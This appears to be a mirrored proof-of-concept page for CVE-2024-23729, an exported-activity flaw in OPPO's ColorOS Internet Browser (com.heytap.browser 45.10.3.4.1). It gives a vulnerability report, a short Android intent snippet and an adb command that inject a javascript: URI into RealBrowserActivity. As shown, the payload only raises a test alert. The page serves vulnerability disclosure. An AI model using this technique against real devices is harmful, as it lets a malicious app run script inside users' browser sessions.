Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-23729 PoC — OPPO ColorOS Internet Browser com.heytap.browser 安全漏洞

Source
Associated Vulnerability
Title:OPPO ColorOS Internet Browser com.heytap.browser 安全漏洞 (CVE-2024-23729)
Description:OPPO ColorOS Internet Browser com.heytap.browser是中国OPPO公司的一个安卓平台浏览器组件应用程序。 OPPO ColorOS Internet Browser com.heytap.browser 45.10.3.4.1版本存在安全漏洞,该漏洞源于允许远程攻击者通过组件执行任意JavaScript代码。
Description
CVE-2024-23729
Readme
## Vulnerability Report

### Overview:
A vulnerability has been discovered in the `com.heytap.browser` application on the Android platform. The vulnerability allows an attacker to execute arbitrary JavsScript code within the context of the application without any permissions.

### Application Details:

- **Vendor:** - ColorOS
- **Application Name:** 'Internet Browser' `com.heytap.browser`
- **Version:** 45.10.3.4.1
- **Component:** com.android.browser.RealBrowserActivity

### Vulnerability Details:

- **Vulnerability Type:** JavaScript Code Execution
- **Attack Vector:** Via an exported activity component
- **Permissions Required:** None

### Description:

The `com.android.browser.RealBrowserActivity` activity in the `com.heytap.browser` app is exported and can be invoked by any third-party application without requiring any permissions. A malicious app can exploit this to execute arbitrary JavaScript code within the context of the `com.heytap.browser`` application.


### Proof of Concept (PoC):


```
{
        super.onCreate(savedInstanceState);

        String javaScriptCommand = "javascript:alert%28%27Test%20Alert%27%29%3B";

        Intent intent = new Intent(Intent.ACTION_VIEW);
        intent.setData(Uri.parse(javaScriptCommand));
        intent.setClassName("com.heytap.browser", "com.android.browser.RealBrowserActivity");

        startActivity(intent);

        finish();
    }
```

```

adb shell am start -a android.intent.action.VIEW -d "javascript:alert%28%27Test%20Alert%27%29%3B" -n com.heytap.browser/com.android.browser.RealBrowserActivity

```

![com heytap browser- 45 10 3 4 1-JS](https://github.com/user-attachments/assets/df6abee3-525e-45b0-8439-223707074010)
![poc-coloros](https://github.com/actuator/com.heytap.browser/assets/78701239/952f08c7-b8d6-4982-80bb-28b693b20134)




### Impact:

Successful exploitation allows an attacker to:
- Execute arbitrary JavaScript code within the context of the `com.heytap.browser` app.


File Snapshot

[4.0K] /data/pocs/bb2761e3b06b8185adfae5f7656ad08b4aceff42 ├── [1.5K] CVE-2024-23729 └── [1.9K] README.md 1 directory, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.